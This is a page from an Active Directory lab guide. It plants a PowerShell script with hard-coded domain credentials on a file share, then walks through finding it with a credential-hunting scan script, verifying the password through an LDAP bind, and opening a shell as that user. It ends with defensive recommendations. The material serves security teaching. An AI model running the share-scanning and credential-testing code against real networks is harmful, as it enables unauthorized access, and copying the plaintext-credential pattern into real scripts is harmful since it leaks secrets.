# Password on shares

## Configuring

### Prerequisite

{% content-ref url="page-3" %}
[page-3](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/misc/page-3)
{% endcontent-ref %}

### Configuring

1. Login on `DC02` with the username `Administrator` and password `Welcome01!`.
2. Open the "Active Directory Users and Computers" administration tool on `DC02`.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FHCV9WJ3HHhrkq300sFY3%2Fimage.png?alt=media&#x26;token=68b57427-b249-400f-b7ab-fa662c6788f4" alt=""></div>

3\. Right click on the "Users" directory and select "New" and then "User". Create a user with the name `testreset`.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FsMWBDyRb5NwRkttUY5pk%2Fimage.png?alt=media&#x26;token=51d818da-5a8c-4f0a-8474-77181aec1bd1" alt=""></div>

4\. Fill in the password `Testing123Testing!` and select "Password never expires" and make sure "User must change password at next logon" is not selected.

5\. Login on `FILE01` with the username `Administrator` and password `Welcome01!`.

6\. Open "Windows Explorer" and browse to `C:\Share\IT`.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FXsiGa5WoaPAol8MifVDo%2Fimage.png?alt=media&#x26;token=e577dbe5-bb1c-4f76-b478-8d0145a4e5a0" alt=""></div>

7\. Create a directory "Scripts" and open it. Then create a new text document with the name `Password-reset-transferuser-testscript.ps1` and place the following content inside it (the hard-coded plaintext password is the misconfiguration this lab is about):

```powershell
# Plaintext credentials hard-coded in the script: this is the leak the lab demonstrates.
$plainPwd = 'Testing123Testing!'
$secPwd = ConvertTo-SecureString $plainPwd -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential("amsterdam\testreset", $secPwd)

Import-Module ActiveDirectory
#Generate a 15-character random password from printable ASCII (33..126).
$Password = -join ((33..126) | Get-Random -Count 15 | ForEach-Object { [char]$_ })
$NewPwd = ConvertTo-SecureString $Password -AsPlainText -Force
$user = "sa_transfer_test"
Set-ADAccountPassword $user -NewPassword $NewPwd -Reset -Credential $credentials
#Display userid and new password on the console.
Write-Host $user, $Password
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2Feqai94R4K05TmHU1ltlm%2Fimage.png?alt=media&#x26;token=adb3658c-4c9b-419a-a5e0-82ad4a414484" alt=""></div>

8\. Download a couple of decoy scripts into the same folder so the interesting one has to be found among harmless ones, for example (run from `C:\Share\IT\Scripts`; `wget` is only an alias for `Invoke-WebRequest` in Windows PowerShell and needs `-OutFile` to actually write the file):

```powershell
Invoke-WebRequest -Uri https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/Windows%2010/CreateLocalAdminAcc.ps1 -OutFile CreateLocalAdminAcc.ps1
Invoke-WebRequest -Uri https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Add-UsersToGroup.ps1 -OutFile Add-UsersToGroup.ps1
Invoke-WebRequest -Uri https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/CleanupDisabledUsers.ps1 -OutFile CleanupDisabledUsers.ps1
Invoke-WebRequest -Uri https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Get-ADUsers.ps1 -OutFile Get-ADUsers.ps1
Invoke-WebRequest -Uri https://raw.githubusercontent.com/ruudmens/LazyAdmin/master/ActiveDirectory/Get-ADComputers.ps1 -OutFile Get-ADComputers.ps1
```
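The eight steps above as one PowerShell run, added here as an example and not part of the original page. Part 1 runs on `DC02` and part 2 on `FILE01`, both as `Administrator`; it assumes the lab's `amsterdam` domain, the default `Users` container, the share root `C:\Share\IT` and the file names used above, and that the GitHub URLs from step 8 are still reachable.

```powershell
# Added example: automates steps 1-8 above. Assumes the lab domain "amsterdam",
# share root C:\Share\IT on FILE01 and the names used in the steps.

# ---- Part 1: on DC02, create the testreset account in the default Users container ----
Import-Module ActiveDirectory
$initialPwd = ConvertTo-SecureString 'Testing123Testing!' -AsPlainText -Force
New-ADUser -Name 'testreset' -SamAccountName 'testreset' -AccountPassword $initialPwd `
    -Enabled $true -PasswordNeverExpires $true -ChangePasswordAtLogon $false
# Check the flags that step 4 sets in the GUI.
Get-ADUser testreset -Properties PasswordNeverExpires |
    Select-Object SamAccountName, Enabled, PasswordNeverExpires

# ---- Part 2: on FILE01, put the script with the hard-coded credentials on the share ----
$scriptsDir = 'C:\Share\IT\Scripts'
New-Item -ItemType Directory -Path $scriptsDir -Force | Out-Null

# Single-quoted here-string: $ stays literal, so the file is written out exactly as shown.
$leakyScript = @'
$plainPwd = 'Testing123Testing!'
$secPwd = ConvertTo-SecureString $plainPwd -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential("amsterdam\testreset", $secPwd)

Import-Module ActiveDirectory
#Generate a 15-character random password.
$Password = -join ((33..126) | Get-Random -Count 15 | ForEach-Object { [char]$_ })
$NewPwd = ConvertTo-SecureString $Password -AsPlainText -Force
$user = "sa_transfer_test"
Set-ADAccountPassword $user -NewPassword $NewPwd -Reset -Credential $credentials
#Display userid and new password on the console.
Write-Host $user, $Password
'@
Set-Content -Path (Join-Path $scriptsDir 'Password-reset-transferuser-testscript.ps1') `
    -Value $leakyScript -Encoding ASCII

# Decoy scripts from step 8, so the interesting file has to be found among harmless ones.
$base = 'https://raw.githubusercontent.com/ruudmens/LazyAdmin/master'
$decoys = 'Windows%2010/CreateLocalAdminAcc.ps1',
          'ActiveDirectory/Add-UsersToGroup.ps1',
          'ActiveDirectory/CleanupDisabledUsers.ps1',
          'ActiveDirectory/Get-ADUsers.ps1',
          'ActiveDirectory/Get-ADComputers.ps1'
foreach ($rel in $decoys) {
    $name = Split-Path -Path $rel -Leaf
    Invoke-WebRequest -Uri "$base/$rel" -OutFile (Join-Path $scriptsDir $name)
}
Get-ChildItem -Path $scriptsDir | Select-Object Name, Length
```

The share itself (`C:\Share` exported as `Data`) and its permissions come from the prerequisite page; this script only adds the account and the files on top of it.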

## Attacking

### How it works

During pentests I often find shares that are readable by every domain user, and they frequently contain credentials in configuration files, scripts, or Microsoft Office documents (`.doc`, `.xls`) that someone created to keep track of passwords. Sometimes there is even a NAS that allows null sessions with read/write access on every share.
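An example of the search described above, added here and not from the original page: a PowerShell scan that walks a share and flags files that look like they hold credentials. It assumes read access to `\\file01\Data` as in the lab; the file types and regexes are my choices, not an exhaustive list. The same scan is just as useful for a defender auditing their own shares.

```powershell
# Added example: hunt for credential material on a share. Assumes read access to $Root.
# Save as Find-ShareSecrets.ps1 and run: .\Find-ShareSecrets.ps1 -Root \\file01\Data
param(
    [string]$Root = '\\file01\Data'
)

# File types worth reading: scripts, configs and the "password list" documents people keep on shares.
$extensions = '*.ps1','*.bat','*.cmd','*.vbs','*.txt','*.ini','*.cfg','*.config','*.xml','*.json','*.doc*','*.xls*'

# Patterns that usually sit next to a secret (my selection; extend as needed).
$patterns = @{
    'plaintext assignment' = '(?i)(pass(word|wd)?|pwd|secret)\w*\s*[=:]\s*\S+'
    'PSCredential'         = '(?i)PSCredential\s*\('
    'SecureString'         = '(?i)ConvertTo-SecureString\s+.*-AsPlainText'
    'connection string'    = '(?i)(Password|Pwd)=[^;]+;'
    'net use'              = '(?i)\bnet\s+use\b.*/user:'
    'runas'                = '(?i)\brunas\b.*/user:'
}

$hits = Get-ChildItem -Path $Root -Recurse -File -Include $extensions -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        # Office files are binary or zipped XML, so Select-String cannot read them; flag them by name.
        if ($file.Extension -match '^\.(doc|xls)') {
            [pscustomobject]@{ File = $file.FullName; Rule = 'office document on share'; Line = 0; Text = '' }
            return
        }
        foreach ($rule in $patterns.Keys) {
            Select-String -Path $file.FullName -Pattern $patterns[$rule] -ErrorAction SilentlyContinue |
                ForEach-Object {
                    [pscustomobject]@{ File = $_.Path; Rule = $rule; Line = $_.LineNumber; Text = $_.Line.Trim() }
                }
        }
    }

# One row per suspicious line; the lab's leaky script shows up under several rules.
$hits | Sort-Object File, Line | Format-Table -AutoSize -Wrap
```

Against the lab share this reports `IT\Scripts\Password-reset-transferuser-testscript.ps1` for the plaintext password line, the `ConvertTo-SecureString ... -AsPlainText` line and the `PSCredential(` line; the decoy scripts from LazyAdmin may produce a few false positives on variable names, which is normal for a first pass and why the matched text is printed next to the file.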

### Tools

* File Explorer on `WS01` to browse the share.
* PowerShell, started with "Run as different user", to test the discovered credentials.

### Executing the attack

The attack starts from the point where the IT share on `FILE01` has already been discovered and is accessible (see the prerequisite page):

{% content-ref url="page-3" %}
[page-3](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/misc/page-3)
{% endcontent-ref %}

1. To browse the share comfortably, log in on `WS01` as `noah` with the password `haoNHasAStrongPassword321!@`.
2. Open File Explorer and browse to `\\file01\Data`.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FYCM8AnkPX8z73b2UBUwH%2Fimage.png?alt=media&#x26;token=eabac2f6-b7f9-4cef-b255-d5b97cb04946" alt=""></div>

3\. Open the IT directory and then the Scripts directory.

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FNzvcRLSbbhrapAuKoQ8t%2Fimage.png?alt=media\&token=9e5aa709-c4e2-4089-86ce-14c2d118a1a6)

4\. While looking through the scripts we see that `Password-reset-transferuser-testscript` has login credentials saved in it:

![](https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FuYDCaArJdVLBti3Y34cV%2Fimage.png?alt=media\&token=50aeae85-8b83-414a-ae19-606e03e3ad80)

5\. The password for the user `testreset` is most likely `Testing123Testing!`. After reading through the code it appears to be a script that resets the password of the user `sa_transfer_test` using the credentials of `testreset`, so `testreset` must hold a password-reset right on that account.

We can test this by starting a new PowerShell session as this user: open PowerShell, right-click its icon on the taskbar, then hold Shift and right-click "Windows PowerShell" in the jump list and select "Run as different user".

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2F8auP9EPddD3VbP8ONnD0%2Fimage.png?alt=media&#x26;token=a7962e45-0c6f-4011-b1ec-e214731bd926" alt=""></div>

6\. Copy and paste the credentials and click "OK". A PowerShell window opens; type `whoami` to check that we are running as the `testreset` user:

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FGxTh9tLH0HBkS66ohiZ9%2Fimage.png?alt=media&#x26;token=a12dbce0-183f-493e-9c66-d8b9b6a99754" alt=""></div>
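The same check without the GUI, added here as an example and not part of the original page: verify the credentials found in the script with a bind to the domain controller, then start PowerShell as that user with `Start-Process -Credential`. It assumes `DC02` is a reachable domain controller for the `amsterdam` domain and needs no RSAT module on `WS01`. Every attempt, successful or not, is a logon against the DC and shows up in its security log, so keep the number of tries small on a real engagement.

```powershell
# Added example: verify credentials found on the share without the GUI. Assumes DC02 is
# a reachable domain controller for the "amsterdam" domain; no RSAT module is needed.

function Test-DomainCredential {
    param(
        [Parameter(Mandatory)][string]$UserName,   # DOMAIN\user as found in the script
        [Parameter(Mandatory)][string]$Password,
        [string]$Server = 'DC02'
    )
    try {
        # DirectoryEntry binds with the default (Secure/Negotiate) authentication type.
        # Reading NativeObject forces the bind; a wrong password throws here.
        $entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Server", $UserName, $Password)
        $null = $entry.NativeObject
        return $true
    } catch {
        Write-Verbose "Bind as $UserName failed: $($_.Exception.Message)"
        return $false
    } finally {
        if ($entry) { $entry.Dispose() }
    }
}

# Values lifted from Password-reset-transferuser-testscript.ps1 on the share.
$foundUser = 'amsterdam\testreset'
$foundPwd  = 'Testing123Testing!'

if (Test-DomainCredential -UserName $foundUser -Password $foundPwd -Verbose) {
    "Valid: $foundUser"
    # Equivalent of "Run as different user": a new PowerShell running as testreset,
    # with whoami so the window shows who it is (the same check as step 6).
    $cred = New-Object System.Management.Automation.PSCredential(
        $foundUser, (ConvertTo-SecureString $foundPwd -AsPlainText -Force))
    Start-Process -FilePath powershell.exe -Credential $cred -ArgumentList '-NoExit', '-Command', 'whoami'
} else {
    "Invalid, expired or locked: $foundUser"
}
```

`Start-Process -Credential` creates a real logon session for `testreset` on `WS01`, so the new window has that user's Kerberos ticket and the AD cmdlets or `Set-ADAccountPassword` run in it with `testreset`'s rights, which is what the next page abuses.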

On the following page the ACLs this account holds are abused by resetting the password of another user:

{% content-ref url="../active-directory-attacks/acl-abuses/forcechangepassword" %}
[forcechangepassword](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/acl-abuses/forcechangepassword)
{% endcontent-ref %}

## Defending

### Recommendations

* Don't store credentials in plaintext in scripts, configuration files or documents, least of all on a share that every domain user can read.
* Restrict share permissions to the group that actually needs the data instead of "Everyone" or "Domain Users", and periodically scan shares for files that contain credentials.
